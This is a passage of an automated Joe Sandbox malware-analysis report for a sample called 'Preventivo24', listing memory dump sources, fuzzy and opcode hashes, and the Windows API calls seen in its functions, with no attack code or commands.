                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID: GET$HTTP/1.0
                                                                              • API String ID: 1452528299-2233155769
                                                                              • Opcode ID: 7bd15e12c2f887f2b7e162b380acb4c0aa636cbcc93759da2fa594fe96e652fd
                                                                              • Instruction ID: ef33e480a381f67a4a86cb24923ba46b6d785aaefcb190335b492834be883462
                                                                              • Opcode Fuzzy Hash: 7bd15e12c2f887f2b7e162b380acb4c0aa636cbcc93759da2fa594fe96e652fd
                                                                              • Instruction Fuzzy Hash: 334185B1D0161EDFDB11EFA4C845BAEF7B8FF44720F10452AE925A7390DB7899008BA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • DeleteFileW.KERNEL32(?,00000000,?,00000000,80004005,?,?,?,?,?,?), ref: 00FE9D85
                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,00000080,00000000,B5580983,00000000,00000000,80004005,?,?,?,?,?), ref: 00FE9DFD
                                                                              • CloseHandle.KERNEL32(?,?,011427D0), ref: 00FE9E66
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseCreateDeleteHandle
                                                                              • String ID:
                                                                              • API String ID: 3273607511-0
                                                                              • Opcode ID: d0468d07559774cb1f53697c7a9b45069d64363fbc13c41105904efeab18bf04
                                                                              • Instruction ID: 939330a79c2fb6353577f457eb85b7ab8933bd17de4e96351abc92cff77277f4
                                                                              • Opcode Fuzzy Hash: d0468d07559774cb1f53697c7a9b45069d64363fbc13c41105904efeab18bf04
                                                                              • Instruction Fuzzy Hash: C1310471904658DFCB24CF55DD45BEEB7B4FB04710F108669EA66BB280D7B02941DBB0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: std::_$Facet_GetctypeLockitLockit::~_Register
                                                                              • String ID:
                                                                              • API String ID: 1274453042-0
                                                                              • Opcode ID: 1ed43af64c29c15024bb6523f04519a3f312204ec211f8492e0a86040319d821
                                                                              • Instruction ID: f89aeba3f06404655c381cf00d11ae9c701e5ad5d557d2d2deda7214bdf63a1e
                                                                              • Opcode Fuzzy Hash: 1ed43af64c29c15024bb6523f04519a3f312204ec211f8492e0a86040319d821
                                                                              • Instruction Fuzzy Hash: 6B31B3B1C0564ACFDB05DF68CA4079DFBB0FF24304F108299D8446B251E775AA95CB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00FE1D59
                                                                              • DestroyWindow.USER32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,010FB9A0), ref: 00FE1D68
                                                                              • IsWindow.USER32(?), ref: 00FE1D93
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CurrentDestroyThread
                                                                              • String ID:
                                                                              • API String ID: 2303547079-0
                                                                              • Opcode ID: 89ee8f1adcde44efb53ce347bdba7ea33fc007722b06bc8dc855f054d91f7821
                                                                              • Instruction ID: 4b1cd523910b36e2ee5da0d854c27895d143bea7b181b1647f41057f6f3a29c3
                                                                              • Opcode Fuzzy Hash: 89ee8f1adcde44efb53ce347bdba7ea33fc007722b06bc8dc855f054d91f7821
                                                                              • Instruction Fuzzy Hash: 24F0A070407B50AFD3749F26EA48B56BBE5BF05B10F04095CE08A86994C7B0F880CB58
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(?,?,01095E2A,?,0108F842,?,?,B5580983,0108F842,?), ref: 01095E41
                                                                              • TerminateProcess.KERNEL32(00000000,?,01095E2A,?,0108F842,?,?,B5580983,0108F842,?), ref: 01095E48
                                                                              • ExitProcess.KERNEL32 ref: 01095E5A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CurrentExitTerminate
                                                                              • String ID:
                                                                              • API String ID: 1703294689-0
                                                                              • Opcode ID: 751caac9ba8e1f62715a848eff97fc570f7ce9200ef3c720e2cb406731890007
                                                                              • Instruction ID: 3b86fcf716cd9345e76cff0055b1e519868543f7768eda34c5f6072c29df332e
                                                                              • Opcode Fuzzy Hash: 751caac9ba8e1f62715a848eff97fc570f7ce9200ef3c720e2cb406731890007
                                                                              • Instruction Fuzzy Hash: A9D05E31000208AFCF2A3F66DE0C8CA7F2AAF103407008021F9544A265CB328882EB40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000025,00000000,B5580983,00000000,00000010,00000010), ref: 00FBE352
                                                                                • Part of subcall function 00FBE430: GetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,?,00000010,00000000,80004005), ref: 00FBE43D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentFolderHeapPathProcessSpecialVariable
                                                                              • String ID: USERPROFILE
                                                                              • API String ID: 2976596683-2419442777
                                                                              • Opcode ID: 3177cc8b11841eba96e28747d894f9090cf29d203b0d5fc0803753a0459ffee8
                                                                              • Instruction ID: c95c3f4e111da15b9689907bbf247db530433becdcf00ed5b0ee101051f8bd46
                                                                              • Opcode Fuzzy Hash: 3177cc8b11841eba96e28747d894f9090cf29d203b0d5fc0803753a0459ffee8
                                                                              • Instruction Fuzzy Hash: 6671B171A006199FDB14EF69C855BEEB7E9FF84320F144269E829A7381DB34AD01CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 05ce467dd12421d78cfdf9a1af7265351d3292d9975d81248e88bcb1299ee424
                                                                              • Instruction ID: 44209988fc8bfcf47dbd4c8e63865b2d8dea456a135c888347d4079fb326eeca
                                                                              • Opcode Fuzzy Hash: 05ce467dd12421d78cfdf9a1af7265351d3292d9975d81248e88bcb1299ee424
                                                                              • Instruction Fuzzy Hash: 8B61CF30A00289CBCB24DF69C8987ADB7B1FF19364F184529E825E7391DB34A885DB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • IsWindow.USER32(00000000), ref: 0100B0E2
                                                                              • EndDialog.USER32(00000000,00000001), ref: 0100B0F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: DialogWindow
                                                                              • String ID:
                                                                              • API String ID: 2634769047-0
                                                                              • Opcode ID: 38fb920a01078e01737746e0b75c25ad6265ad5a1eb3e0b74d6b49d1a04baa20
                                                                              • Instruction ID: 7482d872ccf361324fbca863778323d6ceeeef31936149c0a52edb605e4a633d
                                                                              • Opcode Fuzzy Hash: 38fb920a01078e01737746e0b75c25ad6265ad5a1eb3e0b74d6b49d1a04baa20
                                                                              • Instruction Fuzzy Hash: D761BC34A01644DFDB09CF68C94876CBBF5BF09320F1482A9E865AB3D1CB359E05CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetLastError.KERNEL32(00FE14A6), ref: 00FE1B50
                                                                              • DestroyWindow.USER32(00000000,00000000), ref: 00FE1C0B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: DestroyErrorLastWindow
                                                                              • String ID:
                                                                              • API String ID: 1182162058-0
                                                                              • Opcode ID: 5bac7a26283bb7dfd7a5fbb8002c9596bb7cc2e60803cfa522a8c4e7d1fe3e0a
                                                                              • Instruction ID: 9c99f856a4190f2060a08924232a716c403f98deb818c1f9f0def416e3e68d78
                                                                              • Opcode Fuzzy Hash: 5bac7a26283bb7dfd7a5fbb8002c9596bb7cc2e60803cfa522a8c4e7d1fe3e0a
                                                                              • Instruction Fuzzy Hash: 62212775A001099BDB20AE0AE8027EA77A8FB54330F104266FD14C7381D7B5E861E7F5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00FC0CA0: LoadLibraryW.KERNEL32(ComCtl32.dll,B5580983,?,00000000,00000000), ref: 00FC0CDA
                                                                                • Part of subcall function 00FC0CA0: GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00FC0D00
                                                                                • Part of subcall function 00FC0CA0: FreeLibrary.KERNEL32(00000000), ref: 00FC0D89
                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FC1732
                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FC1741
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryMessageSend$AddressFreeLoadProc
                                                                              • String ID:
                                                                              • API String ID: 3032493519-0
                                                                              • Opcode ID: 6c38dad0bff7b0e12aefa9944054f2b6652dc71eb184ec60f15dfd1d0e731544
                                                                              • Instruction ID: 76c96938d393d96df9fd272f202453b35246ce581fcca6554dd6ca1890308333
                                                                              • Opcode Fuzzy Hash: 6c38dad0bff7b0e12aefa9944054f2b6652dc71eb184ec60f15dfd1d0e731544
                                                                              • Instruction Fuzzy Hash: 27F0B4327512107BE720161A5C47F7BB29DDBC4B20F108229F6549B2C1DDE16C0143D9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000000,00000000,?,010A4864,00000000,010A060A,00000000,?,0109464A,00000000,010A060A,?,?,?,?,010A0404), ref: 010A287C
                                                                              • GetLastError.KERNEL32(?,?,010A4864,00000000,010A060A,00000000,?,0109464A,00000000,010A060A,?,?,?,?,010A0404), ref: 010A2887
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 485612231-0
                                                                              • Opcode ID: 088a975aab3c2bae460d67e19d9dcd7d5a54d5d4f11173c137f3430e5540221c
                                                                              • Instruction ID: 2f527042b436e960fc6741f19b31065d397135d71f2e0bec8b77dd37b94dc37a
                                                                              • Opcode Fuzzy Hash: 088a975aab3c2bae460d67e19d9dcd7d5a54d5d4f11173c137f3430e5540221c
                                                                              • Instruction Fuzzy Hash: A7E0CD31101305ABCB353FF4E90C79DBF9A9B01351F1500B1F65C97150D63484C0C790
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,00000000,00000000,00000000,?,011D0080,00FF7258,?), ref: 00FA4468
                                                                              • MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,?,-00000001), ref: 00FA449A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide
                                                                              • String ID:
                                                                              • API String ID: 626452242-0
                                                                              • Opcode ID: 4b46a6d99797bdc0162021eff7d6b437fd4c4ae36b92caea5d1255b9905424d9
                                                                              • Instruction ID: 550b197912fef9095e283313b32b06921f76e1c7a041ffce91a0492936aa6889
                                                                              • Opcode Fuzzy Hash: 4b46a6d99797bdc0162021eff7d6b437fd4c4ae36b92caea5d1255b9905424d9
                                                                              • Instruction Fuzzy Hash: 8201F935301211AFE614DA59DC89F2EF796EFD5331F20412EFA18EB2D0CB616C019794
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5be32b52a0a4a1b66d24cc168a37fd1bcaad94cfe2b1098ca44cbc6b1c2c31fb
                                                                              • Instruction ID: 4715f1406f8aee52e23052784e26d06e3f6e5d1c00cdcc5cbcb6ea62af94a55e
                                                                              • Opcode Fuzzy Hash: 5be32b52a0a4a1b66d24cc168a37fd1bcaad94cfe2b1098ca44cbc6b1c2c31fb
                                                                              • Instruction Fuzzy Hash: 4EA165B1A05609DFDB04DF68D95479EBBF4FF08314F1081AEE859AB380D775AA04CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • DeleteFileW.KERNEL32(?,B5580983,B5580983,?,?,0115D178), ref: 00FFE804
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
